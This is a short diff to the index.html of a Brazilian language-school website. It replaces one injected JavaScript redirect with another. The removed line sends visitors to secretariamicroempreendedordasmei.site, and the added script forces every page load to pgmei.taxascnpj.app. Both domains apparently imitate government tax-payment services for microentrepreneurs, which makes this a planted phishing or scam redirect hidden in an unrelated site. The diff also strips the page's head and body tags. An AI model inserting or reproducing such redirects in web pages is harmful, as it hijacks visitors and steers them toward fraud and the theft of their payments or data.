--- a/index.html
+++ b/index.html
@@ -12,9 +12,9 @@
     section { padding: 20px; max-width: 900px; margin: auto; }
     footer { background: #eee; text-align: center; padding: 20px; margin-top: 40px; }
   </style>
-</head>
-<script>window.location.href='https://secretariamicroempreendedordasmei.site/?id=1'</script>
-<body>
+<script language= "JavaScript">
+location.href="https://pgmei.taxascnpj.app"
+</script>
   <header>
     <h1>Be Aware – Ensino de Idiomas</h1>
     <p>Aprenda inglês de forma prática, rápida e eficiente.</p>
